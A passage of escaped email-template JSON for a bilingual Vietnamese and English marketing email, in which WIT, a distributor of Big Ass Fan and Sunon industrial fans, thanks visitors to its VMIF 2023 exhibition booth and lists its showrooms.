10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Lato\\\",\\\"value\\\":\\\"\'Lato\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"right\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: Lato, sans-serif; line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"font-size: 34px; line-height: 47.6px;\\\\\\\"><strong>HAMILTON AIR<\\/strong><\\/span><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_4\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"0px\\\",\\\"borderRightColor\\\":\\\"#a5a5a5\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"2px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"0px\\\"},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"55FclmztDX\\\",\\\"contents\\\":[{\\\"id\\\":\\\"88IAIus72W\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 30px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#a5a5a5\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p class=\\\\\\\"p1\\\\\\\" style=\\\\\\\"line-height: 140%;\\\\\\\"><span class=\\\\\\\"s1\\\\\\\" style=\\\\\\\"line-height: 19.6px;\\\\\\\">\\u2705<\\/span> MANG \\u0110\\u1ebeN GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T TI\\u1ec6N NGHI V\\u00c0 TR\\u1ea2I NGHI\\u1ec6M T\\u1ed0T H\\u01a0N CHO GIA \\u0110\\u00ccNH HO\\u1eb6C DOANH NGHI\\u1ec6P<\\/p>\\\\n<p class=\\\\\\\"p2\\\\\\\" style=\\\\\\\"line-height: 140%;\\\\\\\">\\u00a0<\\/p>\\\\n<p class=\\\\\\\"p1\\\\\\\" style=\\\\\\\"line-height: 140%;\\\\\\\">L\\u00e0m cho kh\\u00f4ng gian c\\u1ee7a b\\u1ea1n hi\\u1ec7u qu\\u1ea3 h\\u01a1n v\\u1edbi d\\u00f2ng s\\u1ea3n ph\\u1ea9m lu\\u1ed3ng kh\\u00f4ng kh\\u00ed hi\\u1ec7u qu\\u1ea3 cao.<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"bXYUs1ZZby\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"eo9KgENRVd\\\",\\\"contents\\\":[{\\\"id\\\":\\\"PcA6i4TwOU\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_5\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"nut38M1rZt\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_15\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p class=\\\\\\\"p1\\\\\\\" style=\\\\\\\"line-height: 140%;\\\\\\\">\\u2622\\ufe0f <span style=\\\\\\\"color: #222222; white-space: normal; background-color: #ffffff; float: none; display: inline; line-height: 19.6px;\\\\\\\">First of all, Tổ chức đào tạo WIT Company would like to thank\\u00a0you for visiting our booth number 126 at VMIF Exhibition and Trademark in Binh Duong in 2023.<\\/span><\\/p>\\\\n<div style=\\\\\\\"color: #222222; white-space: normal; background-color: #ffffff;\\\\\\\">Tổ chức đào tạo WIT Company is the exclusive distributor for 2 brands Big Ass Fan and Sunon in the Vietnam market. We specialize in providing industrial fans for Factories, Apartments, Villas and Resorts.<\\/div>\\\\n<p style=\\\\\\\"margin: 0px; font-kerning: auto; font-feature-settings: normal; font-stretch: normal; line-height: 140%;\\\\\\\">\\u00a0<\\/p>\\\\n<p class=\\\\\\\"p1\\\\\\\" style=\\\\\\\"line-height: 140%;\\\\\\\">\\u2622\\ufe0f Whether you have an industrial complex or a small shop, our airflow experts are here to make your life easier, more comfortable, and less expensive.<\\/p>\\\\n<p style=\\\\\\\"margin: 0px; font-kerning: auto; font-optical-sizing: auto; font-feature-settings: normal; font-variation-settings: normal; font-stretch: normal; line-height: 140%;\\\\\\\">\\u2622\\ufe0f\\u00a0 Bring comfort and better experience for your home or business.<\\/p>\\\\n<p style=\\\\\\\"margin: 0px; font-kerning: auto; font-optical-sizing: auto; font-feature-settings: normal; font-variation-settings: normal; font-stretch: normal; line-height: 140%;\\\\\\\">\\u00a0<\\/p>\\\\n<p style=\\\\\\\"margin: 0px; font-kerning: auto; font-optical-sizing: auto; font-feature-settings: normal; font-variation-settings: normal; font-stretch: normal; line-height: 140%;\\\\\\\">-------o0o-------<\\/p>\\\\n<p style=\\\\\\\"margin: 0px; font-kerning: auto; font-optical-sizing: auto; font-feature-settings: normal; font-variation-settings: normal; font-stretch: normal; line-height: 140%;\\\\\\\">\\u00a0<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"line-height: 19.6px;\\\\\\\" class=\\\\\\\"s1\\\\\\\">\\u2705<\\/span>\\u00a0 L\\u1eddi \\u0111\\u1ea7u ti\\u00ean, C\\u00f4ng ty C\\u1ed5 Ph\\u1ea7n Tổ chức đào tạo WIT xin c\\u1ea3m \\u01a1n qu\\u00fd kh\\u00e1ch \\u0111\\u00e3 gh\\u00e9 th\\u0103m gian h\\u00e0ng s\\u1ed1 126 c\\u1ee7a ch\\u00fang t\\u00f4i t\\u1ea1i Tri\\u1ec3n l\\u00e3m v\\u00e0 Th\\u01b0\\u01a1ng hi\\u1ec7u VMIF t\\u1ea1i B\\u00ecnh D\\u01b0\\u01a1ng n\\u0103m 2023.<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"line-height: 19.6px;\\\\\\\" class=\\\\\\\"s1\\\\\\\">\\u2705<\\/span>\\u00a0 C\\u00f4ng ty Tổ chức đào tạo WIT l\\u00e0 nh\\u00e0 ph\\u00e2n ph\\u1ed1i u\\u1ef7 quy\\u1ec1n cho 2 th\\u01b0\\u01a1ng hi\\u1ec7u qu\\u1ea1t l\\u00e0m m\\u00e1t <strong>Big Ass Fan<\\/strong> v\\u00e0 <strong>Sunon<\\/strong> t\\u1ea1i th\\u1ecb tr\\u01b0\\u1eddng Vi\\u1ec7t Nam. Ch\\u00fang t\\u00f4i chuy\\u00ean cung c\\u1ea5p c\\u00e1c lo\\u1ea1i qu\\u1ea1t c\\u00f4ng nghi\\u1ec7p cho Nh\\u00e0 m\\u00e1y, Chung c\\u01b0, Bi\\u1ec7t th\\u1ef1, Resort...<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"color: #222222; white-space: normal; background-color: #ffffff; float: none; display: inline; line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"line-height: 19.6px;\\\\\\\" class=\\\\\\\"s1\\\\\\\">\\u2705<\\/span> Cho d\\u00f9 b\\u1ea1n c\\u00f3 m\\u1ed9t khu li\\u00ean h\\u1ee3p c\\u00f4ng nghi\\u1ec7p hay m\\u1ed9t c\\u1eeda h\\u00e0ng nh\\u1ecf, c\\u00e1c chuy\\u00ean gia v\\u1ec1 lu\\u1ed3ng kh\\u00f4ng kh\\u00ed c\\u1ee7a ch\\u00fang t\\u00f4i lu\\u00f4n s\\u1eb5n s\\u00e0ng gi\\u00fap cu\\u1ed9c s\\u1ed1ng c\\u1ee7a b\\u1ea1n d\\u1ec5 d\\u00e0ng h\\u01a1n, tho\\u1ea3i m\\u00e1i h\\u01a1n v\\u00e0 \\u00edt t\\u1ed1n k\\u00e9m h\\u01a1n.<\\/span><\\/p>\\\\n<p style=\\\\\\\"color: #222222; white-space: normal; background-color: #ffffff; margin: 0px; font-kerning: auto; font-feature-settings: normal; font-stretch: normal; line-height: 140%;\\\\\\\"><span style=\\\\\\\"line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"color: #222222; white-space: normal; background-color: #ffffff; float: none; display: inline; line-height: 19.6px;\\\\\\\"><span class=\\\\\\\"s1\\\\\\\" style=\\\\\\\"line-height: 19.6px;\\\\\\\">\\u2705<\\/span> <\\/span>Mang l\\u1ea1i s\\u1ef1 tho\\u1ea3i m\\u00e1i v\\u00e0 tr\\u1ea3i nghi\\u1ec7m t\\u1ed1t h\\u01a1n cho ng\\u00f4i nh\\u00e0 ho\\u1eb7c doanh nghi\\u1ec7p c\\u1ee7a b\\u1ea1n.<\\/span><\\/p>\\\"}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_6\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"GOL31FaRLf\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"hwbTiM3Utx\\\",\\\"contents\\\":[{\\\"id\\\":\\\"oMjfj_SbVL\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688180196473-sunon_1.jpg\\\",\\\"width\\\":1920,\\\"height\\\":1080},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_9\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"s0WlKmKnTa\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688180218600-vimf-2023.jpg\\\",\\\"width\\\":1920,\\\"height\\\":1080},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_10\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"RUz7q_ip8X\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688181250240-contact.jpg\\\",\\\"width\\\":2125,\\\"height\\\":1341},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_12\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_11\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_8\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"em1-YlvAoX\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"_fkVaQ2PEN\\\",\\\"contents\\\":[{\\\"id\\\":\\\"qZBv269hpu\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_10\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">Kh\\u00f4ng c\\u00f3 nh\\u00e0 s\\u1ea3n xu\\u1ea5t qu\\u1ea1t n\\u00e0o n\\u1ed7 l\\u1ef1c t\\u1ea1o ra c\\u00e1c s\\u1ea3n ph\\u1ea9m ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng h\\u01a1n Qu\\u1ea1t Big Ass. \\u0110\\u00f3 l\\u00e0 l\\u00fd do t\\u1ea1i sao c\\u00e1c doanh nghi\\u1ec7p tr\\u00ean to\\u00e0n th\\u1ebf gi\\u1edbi s\\u1eed d\\u1ee5ng qu\\u1ea1t c\\u1ee7a ch\\u00fang t\\u00f4i \\u0111\\u1ec3 c\\u1eaft gi\\u1ea3m t\\u1edbi 30% chi ph\\u00ed l\\u00e0m m\\u00e1t v\\u00e0 t\\u1ea1i sao c\\u00e1c nh\\u00e0 thi\\u1ebft k\\u1ebf d\\u1ef1a v\\u00e0o c\\u00e1c m\\u1eabu qu\\u1ea1t tr\\u1ea7n \\u0111\\u01b0\\u1ee3c x\\u1ebfp h\\u1ea1ng ENERGY STAR\\u00ae c\\u1ee7a ch\\u00fang t\\u00f4i \\u0111\\u1ec3 \\u0111\\u00e1p \\u1ee9ng nhu c\\u1ea7u ng\\u00e0y c\\u00e0ng t\\u0103ng \\u0111\\u1ed1i v\\u1edbi c\\u00e1c d\\u1ef1 \\u00e1n b\\u1ec1n v\\u1eefng, \\u0111\\u01b0\\u1ee3c ch\\u1ee9ng nh\\u1eadn LEED.<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_10\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#cc7202\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_7\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"THUwYakHTm\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"kwzqhG799A\\\",\\\"contents\\\":[{\\\"id\\\":\\\"3tEuovNfbn\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_3\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"R2C4DOPmwe\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677296625467-quet_BR_code_2023.jpg\\\",\\\"width\\\":800,\\\"height\\\":491},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_8\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_17\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_13\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"OL5bSnxx7M\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"jz40CXaHYv\\\",\\\"contents\\\":[{\\\"id\\\":\\\"zFw374rru6\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"40px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"circle-black\\\",\\\"icons\\\":[{\\\"url\\\":\\\"https:\\/\\/linkedin.com\\/\\\",\\\"name\\\":\\\"LinkedIn\\\"},{\\\"url\\\":\\\"https:\\/\\/twitter.com\\/\\\",\\\"name\\\":\\\"Twitter\\\"},{\\\"url\\\":\\\"https:\\/\\/instagram.com\\/\\\",\\\"name\\\":\\\"Instagram\\\"},{\\\"url\\\":\\\"https:\\/\\/youtube.com\\/\\\",\\\"name\\\":\\\"YouTube\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":15,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"YGvjojNYO8\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#333333\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"180%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_14\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 21.6px;\\\\\\\">GI\\u1ea2I PH\\u00c1P L\\u00c0M M\\u00c1T TO\\u00c0N DI\\u1ec6N KH\\u00d4NG GIAN NH\\u00c0 \\u1ede - V\\u0102N PH\\u00d2NG - NH\\u00c0 X\\u01af\\u1edeNG C\\u00d4NG NGHI\\u1ec6P<\\/span><\\/strong><\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\"><strong>SR THU DUC: <\\/strong>184 Tran Luu, An Phu, Thu Duc, HCM<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\"><strong>SR QU\\u1eacN 7: <\\/strong>812 Happy Valley, Nguyen Van Linh, Tan Phong, District 7, HCM<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\">WIT.\\u00a0 All rights reserved. <\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\">Tax: 0315778682<\\/span><br \\/><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\"><a 